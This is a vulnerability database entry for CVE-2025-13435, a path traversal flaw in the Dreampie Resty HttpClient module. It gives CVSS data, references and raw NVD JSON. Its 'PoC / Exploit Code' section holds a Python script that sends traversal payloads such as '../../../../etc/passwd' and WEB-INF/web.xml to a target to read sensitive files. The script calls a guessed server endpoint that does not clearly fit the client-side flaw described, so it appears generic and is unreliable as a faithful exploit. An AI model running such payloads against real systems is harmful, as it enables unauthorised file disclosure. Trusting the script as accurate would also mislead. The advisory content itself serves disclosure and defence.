CVE-2025-13435

Description

A security vulnerability has been detected in Dreampie Resty up to 1.3.1.SNAPSHOT. This affects the function Request of the file /resty-httpclient/src/main/java/cn/dreampie/client/HttpClient.java of the component HttpClient Module. Such manipulation of the argument filename leads to path traversal. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:dreampie:resty:*:*:*:*:*:*:*:* - VULNERABLE

Dreampie Resty <= 1.3.1.SNAPSHOT

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-13435 PoC - Path Traversal in Dreampie Resty HttpClient
# Target: Dreampie Resty <= 1.3.1.SNAPSHOT

def exploit_path_traversal(target_url, file_path):
    """
    Exploit path traversal vulnerability in Dreampie Resty HttpClient Module
    
    Args:
        target_url: Target application URL
        file_path: Path to file to read (e.g., ../../../../etc/passwd)
    
    Returns:
        Response content if successful
    """
    # Construct malicious request with path traversal payload
    payload = {
        'filename': file_path
    }
    
    try:
        # Send request to vulnerable endpoint
        response = requests.get(
            f'{target_url}/resty-httpclient',
            params=payload,
            timeout=10
        )
        
        if response.status_code == 200:
            return response.text
        else:
            return f'Request failed with status: {response.status_code}'
    except requests.exceptions.RequestException as e:
        return f'Error: {str(e)}'

# Example usage
if __name__ == '__main__':
    target = 'http://target.com/api'
    # Read sensitive files using path traversal
    files_to_read = [
        '../../../../etc/passwd',
        '../../../webapp/WEB-INF/web.xml',
        '../../../../../../etc/hosts'
    ]
    
    for file_path in files_to_read:
        result = exploit_path_traversal(target, file_path)
        print(f'Reading {file_path}:')
        print(result)
        print('-' * 50)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13435
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13435
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13435/
[4] VulDB https://vuldb.com/cve/CVE-2025-13435
[5] https://github.com/Xzzz111/exps/blob/main/archives/Resty-PathTraversal-01/cve_application.md
[6] https://vuldb.com/?ctiid.332979
[7] https://vuldb.com/?id.332979
[8] https://vuldb.com/?submit.687603
[9] https://github.com/Xzzz111/exps/blob/main/archives/Resty-PathTraversal-01/cve_application.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13435", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:24.840", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Dreampie Resty up to 1.3.1.SNAPSHOT. This affects the function Request of the file /resty-httpclient/src/main/java/cn/dreampie/client/HttpClient.java of the component HttpClient Module. Such manipulation of the argument filename leads to path traversal. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dreampie:resty:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.1", "matchCriteriaId": "13C4A48F-86A8-4764-9CC6-8281FD426680"}]}]}], "references": [{"url": "https://github.com/Xzzz111/exps/blob/main/archives/Resty-PathTraversal-01/cve_application.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332979", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332979", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.687603", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/Xzzz111/exps/blob/main/archives/Resty-PathTraversal-01/cve_application.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}